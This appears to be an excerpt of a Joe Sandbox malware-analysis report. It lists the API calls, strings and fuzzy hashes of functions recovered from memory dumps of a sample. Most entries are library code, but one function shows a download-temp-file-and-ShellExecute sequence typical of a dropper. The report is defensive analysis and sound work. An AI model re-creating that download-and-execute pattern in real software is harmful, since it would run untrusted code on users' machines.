Function 00439A79 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AC1
_free.LIBCMT ref: 00439AE5
_free.LIBCMT ref: 00439AF2
_free.LIBCMT ref: 00439B17
_free.LIBCMT ref: 00439B24
_free.LIBCMT ref: 00439B2D
_free.LIBCMT ref: 00439E0B
_free.LIBCMT ref: 00439E13

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54

Function 02112C51 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02112C74
InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 02112C8A
GetTempPathW.KERNEL32(00000105,?), ref: 02112CA6
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02112CBC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02112CF5
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02112D31
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02112D4E
ShellExecuteExW.SHELL32(?), ref: 02112DC5
WaitForSingleObject.KERNEL32(?,00008000), ref: 02112DDA

Strings

<, xrefs: 02112DA2

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
Instruction ID: ad854f5728222369be7f4de373f9b88f60def498f39cdecadb3a852c97d0a773
Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
Instruction Fuzzy Hash: 76413D7594022DAEEB209F64DC85FEAB7BCFF05745F0080B6A549E2150DB709E858FA4

Function 0212EEB2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0212F218,00000004,02127D77,00000004,02128059), ref: 0212EEE9
GetLastError.KERNEL32(?,0212F218,00000004,02127D77,00000004,02128059,?,02128789,?,00000008,02127FFD,00000000,?,?,00000000,?), ref: 0212EEF5
LoadLibraryW.KERNEL32(advapi32.dll,?,0212F218,00000004,02127D77,00000004,02128059,?,02128789,?,00000008,02127FFD,00000000,?,?,00000000), ref: 0212EF05
GetProcAddress.KERNEL32(00000000,00447430), ref: 0212EF1B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF31
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF48
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF5F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF76
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF8D

Strings

advapi32.dll, xrefs: 0212EEE3, 0212EEE8, 0212EF04

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
Instruction ID: c6ea8330f85aaff3609dbecae717ea23ccf3ec5d0f599627f999f36fe6d767c6
Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
Instruction Fuzzy Hash: 33217FB1944750BFE7106FB49C08B9ABFA8EF05B16F104A2AF541D3A11CB7CD440CBA4

Function 0212EEB5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0212F218,00000004,02127D77,00000004,02128059), ref: 0212EEE9
GetLastError.KERNEL32(?,0212F218,00000004,02127D77,00000004,02128059,?,02128789,?,00000008,02127FFD,00000000,?,?,00000000,?), ref: 0212EEF5
LoadLibraryW.KERNEL32(advapi32.dll,?,0212F218,00000004,02127D77,00000004,02128059,?,02128789,?,00000008,02127FFD,00000000,?,?,00000000), ref: 0212EF05
GetProcAddress.KERNEL32(00000000,00447430), ref: 0212EF1B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF31
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF48
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF5F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF76
GetProcAddress.KERNEL32(00000000,00000000), ref: 0212EF8D

Strings

advapi32.dll, xrefs: 0212EEE3, 0212EEE8, 0212EF04

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
Instruction ID: 9ffc56ef51cb6a3e64f2722e487a6e8831f7e38e5fd4499d0251a0d3367b8966
Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
Instruction Fuzzy Hash: 85215EB5944760BFE7106FA49C08B9ABFACEF05B16F104A2AF541D3A51CB7CD450CBA8

Function 02122497 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021266FB), ref: 021224A6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021224B4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021224C2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021266FB), ref: 021224F0
GetProcAddress.KERNEL32(00000000), ref: 021224F7
GetLastError.KERNEL32(?,?,?,021266FB), ref: 02122512
GetLastError.KERNEL32(?,?,?,021266FB), ref: 0212251E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02122534
__CxxThrowException@8.LIBVCRUNTIME ref: 02122542

Strings

kernel32.dll, xrefs: 021224A0, 021224A5, 021224EA

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
Instruction ID: 47f4fc15de88a3ca3345a6544e81993bb50a138c457cc34ee225b482a7a23c63
Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
Instruction Fuzzy Hash: D911A1759403207FE7117B75AC99AAF3BACEE02B127204536FC02D3161EB78D5148AAC

Function 0042483D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856

Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424888
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042494C

Strings

switchState, xrefs: 00424872
pContext, xrefs: 00424936

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798

Function 00419736 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
DuplicateHandle.KERNEL32(00000000), ref: 00419769
SafeRWList.LIBCONCRT ref: 00419788

Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
Part of subcall function 00417757: List.LIBCMT ref: 00417772

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
GetLastError.KERNEL32 ref: 004197A9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197CD

Strings

eventObject, xrefs: 00419792

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D

Function 02130C16 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02130C26
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02130C8D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02130CAA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02130D10
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02130D25
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02130D37
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02130D65
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02130D70
__CxxThrowException@8.LIBVCRUNTIME ref: 02130D9C
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02130DAC

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
Instruction ID: 72565910d71102de4a575694117991935b6a1c43ac5a0608b8695b8d7ab905d2
Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
Instruction Fuzzy Hash: 5941E430A802189FDF16FFA4C4507ED77E76F09704F0440A9D94A6B2C2CB769A09CF66

Function 0214203D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02142051

Part of subcall function 021436C1: HeapFree.KERNEL32(00000000,00000000,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?), ref: 021436D7
Part of subcall function 021436C1: GetLastError.KERNEL32(?,?,0214A34F,?,00000000,?,00000000,?,0214A5F3,?,00000007,?,?,0214A9E7,?,?), ref: 021436E9

_free.LIBCMT ref: 0214205D
_free.LIBCMT ref: 02142068
_free.LIBCMT ref: 02142073
_free.LIBCMT ref: 0214207E
_free.LIBCMT ref: 02142089
_free.LIBCMT ref: 02142094
_free.LIBCMT ref: 0214209F
_free.LIBCMT ref: 021420AA
_free.LIBCMT ref: 021420B8

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: cc9fb6f051a7eb5626a499a1ae6625626db52029bb8a6eb622dff6be044183bd
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: D5114076950109BFCB01EF94C941DD93FA6EF04350B6185A5BA2C8B271DB31EBA09F80

Function 00431DD6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DEA

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 00431DF6
_free.LIBCMT ref: 00431E01
_free.LIBCMT ref: 00431E0C
_free.LIBCMT ref: 00431E17
_free.LIBCMT ref: 00431E22
_free.LIBCMT ref: 00431E2D
_free.LIBCMT ref: 00431E38
_free.LIBCMT ref: 00431E43
_free.LIBCMT ref: 00431E51

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88

Function 0042E1A2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1CE
__cftoe.LIBCMT ref: 0042E200

Strings

<(@, xrefs: 0042E219, 0042E1B0
<(@, xrefs: 0042E24E, 0042E1BC, 0042E251

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: __cftoe
String ID: <(@$<(@
API String ID: 4189289331-1745028333
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D

Function 0043EE92 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5

Strings

pow, xrefs: 0043EF99, 0043F045, 0043F058
log10, xrefs: 0043EEFF, 0043EF4F
sqrt, xrefs: 0043F039
exp, xrefs: 0043EF7A, 0043EFDC
log, xrefs: 0043EF5B, 0043EF67
asin, xrefs: 0043F021
acos, xrefs: 0043F02D

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E

Function 02143180 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: 734271ea8a3a2efc1cb80a6c9199631255b525704a50c1d24c715f38f7c70881
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: 95C1F770D84349AFDF16DF98D844BAEBBB1AF09314F2841D5E828AB391CB359941CF61

Function 00428CAD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
PMDtoOffset.LIBCMT ref: 00428D3F

Strings

Bad dynamic_cast!, xrefs: 00428D81

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9

Function 0211C3E6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0211C3F7
int.LIBCPMT ref: 0211C40E

Part of subcall function 0211BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0211BFCA
Part of subcall function 0211BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0211BFE4

std::locale::_Getfacet.LIBCPMT ref: 0211C417
std::_Facet_Register.LIBCPMT ref: 0211C448
std::_Lockit::~_Lockit.LIBCPMT ref: 0211C45E
__CxxThrowException@8.LIBVCRUNTIME ref: 0211C47C

Strings

Xd, xrefs: 0211C405, 0211C455

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: Xd
API String ID: 2243866535-3700221569
Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction ID: b7af1b7f980185fe1481dab3595348a23f1f5aa31e583092c730437f37216813
Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction Fuzzy Hash: C811E1728C02299FCF14EBA0D841AFD7772AF44720F10043AE811A7291DB349A05CFE2

Function 02114E71 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02114E82
int.LIBCPMT ref: 02114E99

Part of subcall function 0211BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0211BFCA
Part of subcall function 0211BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0211BFE4

std::locale::_Getfacet.LIBCPMT ref: 02114EA2
std::_Facet_Register.LIBCPMT ref: 02114ED3
std::_Lockit::~_Lockit.LIBCPMT ref: 02114EE9
__CxxThrowException@8.LIBVCRUNTIME ref: 02114F07

Strings

@'d, xrefs: 02114E90, 02114EE0

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: @'d
API String ID: 2243866535-532759542
Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction ID: 0494b6480e18e957bc181fa4954cf762c5302b3200c8f763282ced2b4a857157
Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction Fuzzy Hash: D411E5719802299FCF24EFA0D840AEE77B2BF44714F240439E815A72D0DB349A04CF91

Function 0040C17F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
int.LIBCPMT ref: 0040C1A7

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
std::_Facet_Register.LIBCPMT ref: 0040C1E1
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C215

Strings

Xd, xrefs: 0040C19E, 0040C1EE

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: Xd
API String ID: 2243866535-3700221569
Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99

Function 00404C0A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
int.LIBCPMT ref: 00404C32

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00404C3B
std::_Facet_Register.LIBCPMT ref: 00404C6C
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0

Strings

@'d, xrefs: 00404C29, 00404C79

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: @'d
API String ID: 2243866535-532759542
Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C

Function 0212C6B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0212C6CC
atomic_compare_exchange.LIBCONCRT ref: 0212C6F0
std::_Cnd_initX.LIBCPMT ref: 0212C701
std::_Cnd_initX.LIBCPMT ref: 0212C70F

Part of subcall function 02111370: __Mtx_unlock.LIBCPMT ref: 02111377

std::_Cnd_initX.LIBCPMT ref: 0212C71F

Part of subcall function 0212C3DF: __Cnd_broadcast.LIBCPMT ref: 0212C3E6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0212C72D

Strings

d#D, xrefs: 0212C6B2

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: d#D
API String ID: 4258476935-2139572230
Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
Instruction ID: 7e41592631e4b009bffd47ccc02a5105ac0e84b004db5d287ac3a81f9d9d2eb5
Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
Instruction Fuzzy Hash: 8F01F775980611AFDB20B7708D44B9EB35BAF04310F100011FA0597680EBB4EB298ED2

Function 00432124 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
__alloca_probe_16.LIBCMT ref: 004321B6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
__alloca_probe_16.LIBCMT ref: 0043229B
